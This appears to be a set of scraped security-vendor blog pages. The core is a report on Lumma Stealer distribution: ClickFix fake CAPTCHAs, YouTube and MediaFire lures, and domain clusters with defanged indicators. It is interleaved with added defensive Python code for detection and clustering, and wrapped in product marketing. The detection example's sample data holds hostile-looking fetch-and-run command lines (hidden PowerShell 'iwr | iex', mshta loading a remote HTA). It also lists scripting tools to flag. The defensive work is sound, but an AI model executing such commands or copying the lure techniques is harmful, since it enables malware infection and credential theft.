Why Take A Proactive Approach To Threat Detection?

Security teams strive to be on the offensive by identifying emerging threats before they surface and have a chance to do damage. Such threat detection strategies are used across the board in multiple industries, including finance, government and healthcare. 

Unfortunately, a standard approach to threat intelligence and threat hunting often puts security teams on the defensive, forcing them to sift through outdated intelligence that eats into their response time. 

Given that only 2% of global threat infrastructure is being tracked in cybersecurity at any given time, organizations simply don’t have the ability to obtain a complete view of any given threat landscape, and are forced to reactively mitigate attacks that originate from the hidden 98%. 

In this blog, we’ll explain how to plan an offensive strategy with a complete view of attacker infrastructure to protect your organization, and describe how Silent Push facilitates fast, accurate proactive threat detection using Indicators of Future Attack™ (IOFA™). 

What is the Difference Between Proactive vs. Reactive Threat Detection? 

Proactive threat detection locates and stops carefully orchestrated cyber attacks before they cause damage. 

In boxing, there’s an old saying – “hit and don’t get hit”. A fighter who has the ability to be on the offensive minimizes the amount of hits their opponent can make, causing them to become preoccupied with defending themselves rather than attacking. 

A proactive security team doesn’t sit back and wait for the punches to come to them. They understand their attack surface, they know how they’re going to be targeted – and by whom – and they take the fight to the threat actor by shutting down digital assaults before they’re launched with industry-leading Indicators of Future Attack™ (IOFA™). 

Reactive security teams fight behind their gloves, and hope for the best by dealing with incidents at the perimeter, rather than going out on the attack and proactively locating threat infrastructure. Sooner or later, one of those punches will get through, and that’s when the knockout blow comes in the form of a breach. 

They rely on stale lists of post-breach IOCs that only serve to inform defenders about where an attack has come from, rather than where it’s going to be. 

Reactive teams formulate a defense as a REACTION to an attack that has occurred elsewhere. They aren’t able to ascertain where an adversary is going to strike before they attack, and they are in the dark about the infrastructure being set up. 

If your teams aren’t proactively tracking and monitoring both emerging and active threat infrastructure, the knockout blow is just around the corner, your potential exposure to an attack increases, and with it the chances of a costly breach. 

Proactively Identify Threat Actor Tactics 

Preemptive threat intelligence allows you to proactively identify threat infrastructure as it’s being set up, and before an adversary launches an attack. 

It’s the only reliable way to outsmart adversaries and take control back. 

Security teams need to move away from a reactive, IOC-led approach to threat intelligence and focus on the underlying tactics and strategies threat actors use to deploy infrastructure, rather than simply dealing with the individual domains and IPs used in a previous attack. 

How Does Silent Push Help You Develop an Offensive Approach to Protect Your Organization? 

Silent Push is the first and only threat intelligence solution to deliver IOFA™ and create a unique digital fingerprint of adversary behavior that allows teams to adopt a fully proactive stance by eliminating incoming attacks before they’re launched. 

Our feeds and intelligence streams aren’t made up of retrospective, reactive indicators of previous threat activity. IOFA™ provide your teams with a glimpse into the future, so that you can anticipate and react to emerging threats well before they reach your organization. 

We are the only solution to understand the full attack landscape, and provide this to SOC and IR teams in a way that’s immediately actionable, and doesn’t take up precious time and resources to further investigate and validate before it’s useable. 

Click here to get access to an exclusive report that outlines 4 key cyber threat trends to keep ahead of in 2025, and learn about: 

  • How and where threat actors use these tactics
  • Named adversaries and intent 
  • How to combat threats with Indicators of Future Attack (IOFA)™ 

Learn more about our unique approach to Preemptive Threat Intelligence  

Find out how your organization can use Preemptive Threat Intelligence to outsmart adversaries and stop attacks before they’re launched. 

Contact us here for more information. 


Lumma Stealer Malware Thrives as Silent Push Uncovers Unique Patterns in the Infostealer's Domain Clusters

Key Findings

  • We found Lumma Stealer command and control (C2) domain clusters share certain technical characteristics that enabled our team to map entire clusters of the infostealer’s infrastructure.
  • Lumma Stealer logs are being shared for free on Leaky[.]pro, a relatively new hacking forum, offering billions of “URL:LOG:PASS” records with specific details tied to stolen credentials.
  • The increase in malware being spread via malicious YouTube links and infected files disguised in videos, comments, or descriptions is alarming. Viewers should be skeptical of unverified sources when interacting with YouTube content, particularly when prompted to download or click on links.

Executive Summary

Silent Push Threat Analysts recently expanded on our previous research on “Lumma Stealer” infostealer malware from January 2024. Among the new discoveries, our team found Lumma Stealer logs are being shared for free on Leaky[.]pro, a relatively new hacking forum.

Difficult to detect and prevent, Lumma Stealer malware is spread through various platforms such as video-sharing sites, file-sharing services, and directly through malicious websites. Lumma Stealer infections typically act as enablers for more extensive attacks, including the deployment of ransomware and espionage operations, where attackers gather intelligence or steal intellectual property.

Our team discovered that Lumma Stealer C2 domain clusters are frequently registered in quick succession and, in many cases, appear to be handled via an automated process. These clusters and infrastructure expansion techniques share certain characteristics that our threat analysts have combined to fingerprint Lumma Stealer infrastructure.

The ever-evolving nature of Lumma Stealer campaigns, which often lead to widespread infections, underlines the need for robust, industry-wide cybersecurity measures to mitigate the potential damage they can cause. Platforms frequently abused for distribution include YouTube, the content delivery network (CDN) Cloudflare, and the file-sharing platform/cloud storage company MediaFire. These companies cannot fight this threat alone, however, so Silent Push Threat Analysts are sharing our latest research to help defenders mitigate and prevent the spread of Lumma Stealer infections.


Sign Up for a Free Silent Push Community Account

Register now for our free Community Edition to use all the tools and queries mentioned in this blog.


Lumma Stealer Background

Lumma Stealer was first seen on Russian-language criminal forums in 2022. It continues to be sold under the “Malware-as-a-Service” business model, with different pricing tiers for threat actor operations of varying sizes. From 2023 onward, the number of compromises linked to Lumma Stealer has risen dramatically, particularly those including the resale of stolen credentials to other criminals.

“Infostealer” malware, like Lumma Stealer, refers to malware designed primarily to collect sensitive information (login credentials, browser history, credit card details, and other personal data) from infected systems. Lumma Stealer goes even further, targeting web browser information (cookies, history, extensions, and saved passwords), chat logs, details about installed programs, stored financial information, and even cryptocurrency wallet data. Lumma also targets multiple versions of the Windows operating system.

Malware distribution mechanisms for Lumma Stealer vary greatly depending on the motivation of the specific operator deploying it. Cybercriminals use “stealer logs” (files generated by malware like Lumma Stealer with sensitive information from compromised systems) to exploit stolen data for all types of fraudulent activities, including identity theft. The most effective campaigns seen by our team thus far have also utilized “malvertising” (malicious advertisements) on popular search engines and “malspam” (malicious spam emails) containing harmful attachments.

Building on our initial research back in September of 2023, where we uncovered a trove of active Lumma C2 servers and admin panels as shared in our blog, “The Dead Russian Poets Society: Silent Push Uses Behavioral Fingerprinting, Content Scans, and a 128-year-old Russian Poem to Uncover 150+ New ACTIVE Lumma C2 Servers and Admin Panels,” our team published additional research in January 2024 on the discovery of Lumma Stealer C2 and control panels hosted on Cloudflare infrastructure.

In this latest report, our threat analysts observed that threat actors using Lumma Stealer appear to register clusters of roughly 10-20 domains at a time, some of which are used immediately and others that are left to age for up to two weeks. Knowing this, we can then search for and unearth the “aging” domains if even one of the active domains can be found.

Our team believes readers of this report should be aware of the increase in malware spread via YouTube. Malicious links and infected files are often disguised in videos, comments, or descriptions. Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats.

Note: Our threat analysts have noticed malicious actors often change their infrastructure and tactics based on the details included in our public blog posts, so we have omitted many of the key details needed to circumvent detection from this post for operational security reasons. Enterprise customers have access to a fully detailed report on Lumma Stealer’s methods as well as IOFA™ feeds that enable easy blocking of all associated infrastructure.

Exploring Lumma Stealer Practices

Initial Intelligence: Lumma Stealer Logs’ Distribution

Silent Push Threat Analysts discovered a user, “zhack,” on the popular hacking forum BreachForums, who was advertising and distributing Lumma Stealer logs.

Screenshot: user “zhack” advertising and sharing Lumma Stealer logs on BreachForums

Screenshot: Leaky[.]pro promoted within the shared logs

The hacking forum leaky[.]pro was relatively new. The administrator made the first post on 12/29/2024 under the name “fijiwater.”

Screenshot: Leaky[.]pro administrator “fijiwater”

The screenshot below shows a user on the Leaky[.]pro forum advertising three billion records of “URL:LOG:PASS” that refer to stealer logs with specific website URLs tied to logins (LOG) and passwords (PASS) of stolen credentials.

A leaky[.]pro forum user advertised 3,000,000,000 URL:LOG:PASS records
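The “URL:LOG:PASS” shape described above is what a defender actually receives when such a dump is obtained, and the first job is to find the organization’s own users in it without naively splitting on “:”. The following is an added example, not Silent Push tooling or anything from the forum; the sample dump is constructed (the hosts use example.com and reserved .test names, and none of the credentials are real). It treats the URL as scheme://host[:port][/path], so a port or a colon inside the password does not break the parse, and it masks passwords before they reach a ticket or SIEM.

```python
"""Parse stealer-log "URL:LOG:PASS" records and match them against an
organization's own domains.  Added example, not Silent Push code; the
records below are constructed for illustration and contain no real data."""
import re
from urllib.parse import urlsplit

# Constructed sample dump.  Real dumps are messy: the URL itself contains
# ':' (scheme, sometimes a port), passwords may contain ':', and some
# lines are junk, so splitting on ':' naively is wrong.
SAMPLE_RECORDS = """\
https://mail.example.com/login:alice@example.com:Winter2024!
http://portal.example.com:8443/auth:bob:hunter2
https://accounts.other-site.test/:carol@example.com:p@ss:with:colons
garbage line without separators
android://com.bank.test/:dave:letmein
"""

# URL = scheme://host[:port][/path-without-colons]; login has no ':';
# password is everything after the second real separator.
RECORD_RE = re.compile(
    r"^(?P<url>[A-Za-z][A-Za-z0-9+.-]*://[^:/\s]+(?::\d+)?[^:\s]*)"
    r":(?P<login>[^:]+):(?P<password>.*)$"
)


def parse_record(line):
    """Return a dict for one URL:LOG:PASS line, or None if it is not one."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    host = (urlsplit(m.group("url")).hostname or "").lower()
    return {"url": m.group("url"), "host": host,
            "login": m.group("login"), "password": m.group("password")}


def under_domain(host, org_domains):
    """True if host is one of org_domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in org_domains)


def mask(secret):
    """Never carry plaintext passwords into tickets or SIEM events."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else ""


def find_exposures(dump_text, org_domains):
    """Records whose target site or login e-mail belongs to the organization."""
    org_domains = {d.lower() for d in org_domains}
    hits = []
    for line in dump_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        reasons = []
        if under_domain(rec["host"], org_domains):
            reasons.append("target_site")       # credentials for our own site
        login_domain = rec["login"].rpartition("@")[2].lower() if "@" in rec["login"] else ""
        if login_domain and under_domain(login_domain, org_domains):
            reasons.append("corporate_email")   # our user on a third-party site
        if reasons:
            hits.append({"url": rec["url"], "login": rec["login"],
                         "password": mask(rec["password"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_exposures(SAMPLE_RECORDS, {"example.com"}):
        print(hit)
```

Both match directions matter: a record for the organization’s own login portal means a stolen credential for an internal service, while a corporate e-mail address used on a third-party site points at a user whose machine was infected and whose other accounts should be reviewed.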

The Fake Booking “ClickFix” Technique to Deliver Lumma Stealer

Silent Push Threat Analysts know that organizations and sites with large user bases are commonly victims of phishing and malware campaigns. Our team was able to create a proprietary fingerprint based on observation of these campaigns that detects a large number of phishing pages, including those located on a suspected bulletproof host.

Delving deeper into these suspicious booking pages, our team quickly found they were delivering Lumma Stealer through a fake Cloudflare CAPTCHA, an example of which can be seen below.

The first stage of the fake CAPTCHA

After checking the box for “I’m not a robot,” this message popped up:

Screenshot of the second stage of the fake CAPTCHA / ClickFix page

The presence of “I am not a robot – reCAPTCHA Verification ID: 8731” within the URL suggested that the malware may have attempted to deceive security systems or users by mimicking legitimate reCAPTCHA verification processes, making it appear as though the .HTA file was part of a standard web interaction.

This technique, known as “ClickFix,” involves cybercriminals creating fake CAPTCHA pages, often mimicking Cloudflare’s verification system, that tell the user to complete “verification” by pasting a command the page has silently copied to the clipboard into the Windows Run dialog. The victim therefore launches the malicious code themselves, typically through a built-in Windows tool such as mshta.exe fetching an .HTA file from a remote server. The resulting malware can steal sensitive data, including login credentials, or install further harmful software.
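Because the victim pastes the command into the Run dialog, the resulting process tree is the detection opportunity: a scripting host launched by explorer.exe with a remote URL, often carrying the lure text itself, on its command line. The following is an added example of that hunt logic and is not Silent Push code; it assumes process-creation telemetry with parent image, image and command line fields (Sysmon Event ID 1 style) and uses constructed events on the reserved .invalid TLD.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.
Added example, not Silent Push code.  The events below are constructed
(Sysmon Event ID 1-like fields) and use the reserved .invalid TLD."""
import re

# The lure text quoted on the page rides along in the pasted command, so
# it survives into the command line recorded by EDR/Sysmon.
LURE_RE = re.compile(r"i am not a robot|recaptcha verification id|verification id:", re.I)
# Remote payload: http(s) URL or a UNC path on the command line.
REMOTE_RE = re.compile(r"https?://|\\\\[a-z0-9.-]+\\", re.I)
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "msiexec.exe", "rundll32.exe"}
# The Run dialog (Win+R) launches its command as a child of explorer.exe.
RUN_PARENTS = {"explorer.exe"}

EVENTS = [  # constructed telemetry
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta https://booking-verify.invalid/captcha.hta # "I am not a robot - reCAPTCHA Verification ID: 8731"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://cdn-check.invalid/x | iex"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad readme.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta "C:\Program Files\Vendor\setup.hta"'},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons this event looks like ClickFix; empty list = benign."""
    reasons = []
    if basename(event["image"]) not in LOLBINS:
        return reasons
    if basename(event["parent"]) in RUN_PARENTS:
        reasons.append("lolbin_from_run_dialog")
    if REMOTE_RE.search(event["cmdline"]):
        reasons.append("remote_payload")
    if LURE_RE.search(event["cmdline"]):
        reasons.append("lure_string")
    # Require two weak signals or the lure text: an admin running mshta on a
    # local file from cmd.exe, or explorer starting a shell with no URL, is noise.
    return reasons if len(reasons) >= 2 or "lure_string" in reasons else []


def hunt(events):
    """(image name, reasons) for every event that trips the rule."""
    out = []
    for e in events:
        reasons = classify(e)
        if reasons:
            out.append((basename(e["image"]), reasons))
    return out


if __name__ == "__main__":
    for image, reasons in hunt(EVENTS):
        print(image, reasons)
```

The same three signals translate directly into an EDR or SIEM rule; the lure-string match is the highest-confidence one, since no legitimate administrator types “reCAPTCHA Verification ID” into the Run dialog.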

Following the Surge of Malware as Fake Exploits Fuel Massive Infections through Malicious Sites and YouTube

Silent Push Threat Analysts detected a Lumma Stealer sample being spread through the interactive online malware analysis sandbox, any[.]run. We then expanded our search within our platform and were able to pivot toward more malicious infrastructure spreading Lumma Stealer.

Screenshot: a Lumma Stealer sample detected in the any[.]run platform

Using information derived from this sample, “roxplo1ts[.]ws:443/wave,” our team was able to create yet another proprietary fingerprint that led to more malicious infrastructure.

Screenshot: the malicious site roxplo1ts[.]ws:443/wave

These domains revealed an interesting HTML title, “Roblox #1 Xeno Executor,” that can be readily searched upon with our Silent Push Web Scanner. This campaign appeared to be targeting children who play the Roblox game, which had roughly 164 million monthly active users in 2020. By focusing on the HTML title used here, we were able to combine additional technical details to create yet another effective fingerprint.

A YouTube search using the various pieces of information derived from our searches within the Silent Push Web Scanner revealed a disturbing number of YouTube videos spreading malware through MediaFire links. These videos also appeared to be from compromised accounts that were, themselves, victims.

Examples of suspicious exploits being advertised through YouTube

In testing one of these examples, youtube[.]com/watch?v=d_D4kgSVDIk, our team noted a description that led potential victims to a download link hosted outside of YouTube, alongside suspect hashtags. That link took victims to the external site “deckarenids[.]com/roblox-executor”.

Description from the suspicious video: youtube[.]com/watch?v=d_D4kgSVDIk

This follows the same pattern we have previously observed with Lumma Stealer; however, in this case, before downloading the suspicious file, the victim was required to watch a YouTube video. This strongly suggested that the threat actors were using this tactic to harvest views and manipulate the YouTube algorithm.

A visitor to lootdest[.]org/s?4d456215 was required to watch a YouTube video to unlock the content

We determined the suspicious file, seen here on VirusTotal, was not actually Lumma Stealer. This indicated that these actors are also using other methods and payloads to spread their campaigns. Bearing this in mind, our team was able to produce additional unique fingerprints to hunt for similarly suspect sites that may spread either Lumma Stealer or other types of malware.

Given the large scale of activity, our team is monitoring these results carefully and continuously iterating upon our fingerprinting techniques in order to stay ahead of the threat actors regardless of the type of malware used.

Unique Lumma Stealer Poem Leads to SecTopRAT Malware

In 2023, Silent Push wrote about threat actors using a Russian poem titled “The Curious Case of Sergei Yesenin’s Body Data” in our blog, “The Dead Russian Poets Society: Silent Push Uses Behavioral Fingerprinting, Content Scans, and a 128-Year-Old Russian Poem to Uncover 150+ New ACTIVE Lumma C2 Servers and Admin Panels.”

In our earlier research, we hypothesized that Lumma Stealer’s administrators amended their C2 infrastructure to point at the generic Russian poem based on some sort of personal preference. Further investigation showed that some domains shifted from the poetry page to a Lumma Stealer control panel. We thus used the content of the poetry page to scan our database for Lumma C2 domains and IP addresses displaying the same content.

Over the last few years this threat actor group has changed the poem we originally tracked, and still track, on its infrastructure; the current version is shown below.

Screenshot: a sample domain, c3.digital-odyssey[.]shop, showing the new version of the “Sergei Yesenin” poem
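Both the “Roblox #1 Xeno Executor” title search described earlier and the poem-content scan above are content fingerprints: one exact match on the HTML title, one match on body text that must tolerate the operators rewording lines. The following is an added example of how such matching can be implemented, not Silent Push’s Web Scanner; the title is the one quoted on this page, while the reference text stands in for the poem and is constructed, as are the three sample pages.

```python
"""Match web pages against content fingerprints: an exact HTML <title>
and a fuzzy body match that survives small edits to the text.  Added
example, not Silent Push's scanner.  The reference text stands in for
the poem and is constructed; the title is the one quoted on the page."""
import re
from html.parser import HTMLParser


class _Extractor(HTMLParser):
    """Collect <title> text and visible body text, skipping script/style."""
    SKIP = {"script", "style", "noscript"}

    def __init__(self):
        super().__init__()
        self.title, self.body, self._skip, self._in_title = [], [], 0, False

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1
        elif tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if not self._skip:
            (self.title if self._in_title else self.body).append(data)


def normalize(text):
    """Lower-case, drop punctuation, collapse whitespace, so re-wrapping,
    capitalisation or new markup does not break a match."""
    return " ".join(re.sub(r"[^\w\s]", " ", text.lower()).split())


def extract(html):
    """(normalized title, normalized visible body text) for a page."""
    p = _Extractor()
    p.feed(html)
    return normalize(" ".join(p.title)), normalize(" ".join(p.body))


def shingles(text, n=3):
    """Set of word n-grams; a small edit changes only the n-grams around it."""
    words = text.split()
    return {" ".join(words[i:i + n]) for i in range(max(len(words) - n + 1, 0))}


def jaccard(a, b):
    return len(a & b) / len(a | b) if a or b else 0.0


# Constructed stand-in for the poem text; a real scan uses the real text.
REFERENCE_TEXT = """the river sleeps beneath a silver moon
and birch trees whisper to the wind
a lantern burns inside the empty house
where someone waits for morning light
the road runs far beyond the frozen field
and every step is written in the snow"""

FINGERPRINTS = [
    {"name": "roblox-xeno-title", "title": normalize("Roblox #1 Xeno Executor")},
    {"name": "poem-body", "shingles": shingles(normalize(REFERENCE_TEXT)), "threshold": 0.5},
]


def match(html, fingerprints=FINGERPRINTS):
    """Names of every fingerprint the page satisfies."""
    title, body = extract(html)
    body_sh = shingles(body)
    hits = []
    for fp in fingerprints:
        if "title" in fp and title == fp["title"]:
            hits.append(fp["name"])
        elif "shingles" in fp and jaccard(body_sh, fp["shingles"]) >= fp["threshold"]:
            hits.append(fp["name"])
    return hits


# Constructed pages: the lure site, the poem page with one line reworded
# (the operators have changed the poem before), and a benign page.
PAGE_ROBLOX = ("<html><head><title>Roblox #1 Xeno Executor</title></head>"
               "<body><h1>Download</h1></body></html>")
EDITED_TEXT = REFERENCE_TEXT.replace("someone waits for morning", "nobody waits for evening")
PAGE_POEM_EDITED = ("<html><head><title>Untitled</title><script>var x=1;</script></head><body>"
                    + "".join(f"<p>{line}</p>" for line in EDITED_TEXT.splitlines())
                    + "</body></html>")
PAGE_BENIGN = ("<html><head><title>Welcome</title></head>"
               "<body><p>Our company sells office chairs and desks.</p></body></html>")
```

The shingle threshold is the knob: two reworded words in the sample text still score about 0.74 against the reference, while a page that merely shares a few common phrases stays well below 0.5. Raise the threshold if a fingerprint starts matching unrelated pages, and re-baseline the reference text when the operators edit the content again.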

All domains identified through this Russian poem were then analyzed further, which allowed us to create yet another unique fingerprint for Lumma Stealer infrastructure. The web page of one of them, “docu-signer[.]com”, opened with the following content:

Screenshot: docu-signer[.]com web page

In the next step, visitors are instructed to download a malicious “PDF,” seen here on VirusTotal.

The page docu-signer[.]com downloads a malicious PDF

This particular file is actually a Windows shortcut (LNK) file. On further examination of the file and the associated email, our threat analysts determined it was malware that communicated with SecTopRAT C2 infrastructure.

*Note: Our team is conducting an ongoing investigation to determine the connection between SecTopRAT C2 and Lumma Stealer and will share our findings as we determine more.

Intrusion detection system (IDS) rules hitting SecTopRAT C2 communication from VirusTotal as the source

Lumma Stealer Malware Spread Through Cloudflare and MediaFire

A well-known security researcher who goes by Fox_threatintel on X (formerly Twitter) (https://x.com/banthisguy9349/status/1866434351614796165) tagged the Silent Push Threat Intelligence Team in a post pointing out suspicious clusters spreading MediaFire links to password-protected .zip archives through Cloudflare-hosted sites.

Examining the associated infrastructure revealed multiple methods by which our team was able to fingerprint it, leading to further clusters of infrastructure spreading Lumma Stealer.

Screenshot: threat actors spreading Lumma Stealer through English- and Persian-language sites on workingkeys[.]info

Three additional clusters were found through the information contained in the Fox_Threatintel post. From those, we were able to create unique fingerprints to identify each as they continue to spread and evolve.

Screenshot: Lumma Stealer spread through an English- and Arabic-language “File Download” page on techetrs[.]icu

New Lumma Stealer C2 login panel on mikhail-lermontov[.]com

These results also displayed infrastructure details consistent with those we shared in our public blog on Lumma Stealer in 2023, a welcome confirmation of the effectiveness of our current methods.

Older version of Lumma Stealer login panel on 213.252.244[.]62

Lumma Stealer C2 Domain Clusters

Pivoting on a confirmed Lumma domain within our WHOIS scanner revealed additional details our team was able to use across multiple results, many of which were marked as Lumma Stealer C2s in public sources. We noted similarities in the resulting domains’ names as well as reuse of top-level domains (TLDs) such as “.pro”, “.shop”, etc.
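The pivot just described, combined with the registration pattern noted earlier (bursts of roughly 10-20 domains, some used at once and some left to age for up to two weeks), can be expressed as a small clustering step: start from one confirmed domain, keep every record that shares its registrar, nameserver set and naming shape and was created within the burst window, then separate the siblings already seen active from those still aging. The following is an added example and not Silent Push’s WHOIS scanner; the records are constructed on the reserved .test and .example TLDs, and the fields used (registrar, nameservers, creation date, a crude name-shape check) are generic ones, not the proprietary parameters this post deliberately omits.

```python
"""Pivot from one confirmed C2 domain to its registration cluster and
separate "active" from "aging" siblings.  Added example, not Silent
Push's WHOIS scanner; records are constructed on reserved .test/.example
TLDs and the fields are generic, not the post's proprietary parameters."""
from datetime import date, timedelta

# Constructed registration records.  first_seen_active is None when the
# domain has not yet been observed serving anything.
RECORDS = [
    {"domain": "crowsilverlake.test", "created": "2025-01-10", "registrar": "Registrar-A",
     "ns": ("ns1.dns-provider.test", "ns2.dns-provider.test"), "first_seen_active": "2025-01-11"},
    {"domain": "tinbrightmeadow.test", "created": "2025-01-10", "registrar": "Registrar-A",
     "ns": ("ns1.dns-provider.test", "ns2.dns-provider.test"), "first_seen_active": None},
    {"domain": "jellywindharbor.test", "created": "2025-01-11", "registrar": "Registrar-A",
     "ns": ("ns2.dns-provider.test", "ns1.dns-provider.test"), "first_seen_active": "2025-01-12"},
    {"domain": "silkmoonvalley.test", "created": "2025-01-12", "registrar": "Registrar-A",
     "ns": ("ns1.dns-provider.test", "ns2.dns-provider.test"), "first_seen_active": None},
    # Same label on another TLD, different registrar and nameservers: unrelated.
    {"domain": "crowsilverlake.example", "created": "2025-01-10", "registrar": "Registrar-B",
     "ns": ("ns1.other.example",), "first_seen_active": "2025-01-10"},
    # Same registrar/NS but registered years earlier: not part of the burst.
    {"domain": "longestablishedbrand.test", "created": "2019-03-02", "registrar": "Registrar-A",
     "ns": ("ns1.dns-provider.test", "ns2.dns-provider.test"), "first_seen_active": "2019-03-05"},
    # Same burst and registrar, but a very different naming shape.
    {"domain": "cdn.test", "created": "2025-01-10", "registrar": "Registrar-A",
     "ns": ("ns1.dns-provider.test", "ns2.dns-provider.test"), "first_seen_active": "2025-01-10"},
]


def split_domain(domain):
    label, _, tld = domain.rpartition(".")
    return label, tld


def same_name_shape(a, b, max_len_diff=4):
    """Crude stand-in for the naming pattern the post describes: same TLD,
    letters-only labels of similar length."""
    la, ta = split_domain(a)
    lb, tb = split_domain(b)
    return ta == tb and la.isalpha() and lb.isalpha() and abs(len(la) - len(lb)) <= max_len_diff


def find_cluster(seed_domain, records, window_days=14):
    """Every record sharing the seed's registrar, nameserver set and naming
    shape, created within window_days of the seed (the aging window)."""
    seed = next(r for r in records if r["domain"] == seed_domain)
    seed_created = date.fromisoformat(seed["created"])
    window = timedelta(days=window_days)
    cluster = []
    for r in records:
        if r["registrar"] != seed["registrar"] or set(r["ns"]) != set(seed["ns"]):
            continue
        if abs(date.fromisoformat(r["created"]) - seed_created) > window:
            continue
        if not same_name_shape(r["domain"], seed_domain):
            continue
        cluster.append(r)
    return sorted(cluster, key=lambda r: (r["created"], r["domain"]))


def split_aging(cluster):
    """Domains already seen active vs. siblings still waiting to be used."""
    active = [r["domain"] for r in cluster if r["first_seen_active"]]
    aging = [r["domain"] for r in cluster if not r["first_seen_active"]]
    return active, aging


if __name__ == "__main__":
    cluster = find_cluster("crowsilverlake.test", RECORDS)
    active, aging = split_aging(cluster)
    print("active:", active)
    print("aging (block before first use):", aging)
```

The aging list is the preemptive part: those domains have no detections anywhere yet, which is exactly the state in which VirusTotal-style sources show them as clean, and blocking them before first use is what the rest of this section argues for.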

Below is an example of one of the new results, tinpanckakgou[.]shop (source: VirusTotal) that was marked as “malicious” by 19 different vendors. The domain had multiple communicating files containing Lumma Stealer. This provided additional confidence that the results of this cluster were related to Lumma Stealer.

Reviewing a new result in VirusTotal – noting links to malicious files

Expanding upon that cluster revealed more than 60 results, all of which featured the same naming schema and the “.shop” TLD. Additional discoveries were made at this stage, but they are too sensitive to refer to publicly without tipping off the threat actors. Suffice to say a significant number of the new results were linked to Lumma Stealer samples, though they showed fewer hits on VirusTotal.

Another new result reviewed in VirusTotal yielded one detection and a 33/72 associated file

In many cases, we saw domains marked as “clean” elsewhere, which our research team was able to confirm internally as Lumma C2 domains.

The results when we initially reviewed in VirusTotal: No known hits

It is evident from these results that VirusTotal’s aggregated vendor verdicts and similar reputation sources often cannot promptly or proactively flag Lumma Stealer domains, particularly ones that have been registered but not yet used. This underscores the need for preemptive threat intelligence, which focuses on discovering infrastructure before it is activated for malicious use. With our data, one can detect entire clusters of Lumma Stealer C2 domains the moment they are weaponized.

Silent Push shines in our capability to quickly identify and respond to emerging threats, providing clients with the enhanced level of security they expect in this era of rapidly scaling and emerging threats. Rest assured that our threat analyst team continues to work to stay ahead of attackers, and our IOFA™ feeds are continuously updated as new tactics, techniques, and procedures (TTPs) are observed.


Additional Information: Continuing to Track Lumma Stealer

As referenced before, key technical information has been omitted from this public blog for operational security.

We have published a TLP:Amber report for our Enterprise users that contains links to the specific queries, lookups, and scans we’ve used to identify and traverse Lumma Stealer infrastructure—including proprietary parameters that we’ve omitted from this blog for security reasons.

Silent Push will continue to report on our work tracking Lumma Stealer and share new findings with the community as our research progresses throughout 2025. If you or your organization have any leads related to this effort, particularly those being used by these threat actors, we would love to hear from you.


Mitigation

Silent Push believes all Lumma Stealer-related domains present some level of risk.

Our analysts construct Silent Push IOFA™ Feeds that provide a growing list of Indicators of Future Attack™ data covering Lumma Stealer C2 domains and the sites that distribute the malware.

Silent Push Indicators of Future Attack™ (IOFA™) Feeds are available as part of an Enterprise subscription. Enterprise users can ingest IOFA™ Feed data into their security stack to inform their detection protocols or use it to pivot across attacker infrastructure using the Silent Push Console and Feed Analytics screen.


Register for Community Edition

Silent Push Community Edition is a free threat-hunting and cyber defense platform featuring a range of advanced offensive and defensive lookups, web content queries, and enriched data types.

Click here to sign up for your free account.


Sample Lumma Stealer Indicators of Future Attacks (IOFA™)

Below is a sample list of IOFA™ associated with Lumma Stealer. Our full list is available for enterprise users. Silent Push Enterprise clients have access to a domain feed containing all Lumma Stealer infrastructure, several IOFA™ Feeds for malware sites that distribute Lumma Stealer and other malware families, and an IOFA feed built to track malicious actors spreading Lumma Stealer based on WHOIS information.

  • 213.252.244[.]62
  • c3.digital-odyssey[.]shop
  • clsevermarketing[.]click
  • crowsudysto[.]shop
  • docu-signer[.]com
  • holmenester[.]com
  • jellysipp[.]shop
  • mikhail-lermontov[.]com
  • pdf-ref095vq842r70[.]com
  • roxplo1tsp[.]was
  • roxplo1ts[.]ws:443/wave
  • techetrs[.]icu
  • tinpanckakgou[.]shop
  • wetransfer[.]su
  • workingkeys[.]info


How To Outsmart Adversaries with Preemptive Threat Intelligence

We’ve previously looked at how Preemptive Threat Intelligence discovers and stops attacks before they’re launched, but how does a preemptive approach keep you one step ahead of adversaries as they evolve their strategies to evade detection? 

In this blog, we’ll explore how Preemptive Threat Intelligence acts as an early warning system by using a threat actor’s own tactics against them, forming a comprehensive picture of how a threat campaign is prepped and launched, so that security teams can proactively defend themselves against known and hidden attacks using Indicators of Future Attack™ (IOFA™). 

How to stop an attack by knowing threat actor tactics and behavior

Preemptive Threat Intelligence allows security teams to locate and block the 98% of global threat infrastructure that’s yet to be discovered, and lurking under the surface. 

Most importantly, it helps you head off any future attacks by knowing where threat actors are going to strike, based on how they behave.

Catching a criminal with preemptive threat intelligence

When a law enforcement agency needs to find and arrest a perpetrator, they gather as much information they can on the person to understand where they are, and where they’re going to strike next. 

We’ve all watched crime shows where the agency builds a file capturing who a criminal associates with, what methods they use to commit a crime, what their motive is, and any other crimes they’re involved in. They also document behaviors such as the places they frequent, the company they keep, and even the brand of cigarettes they smoke. 

All of this enables the good guys to be one step ahead of the bad guys, and lay a trap to put them behind bars.

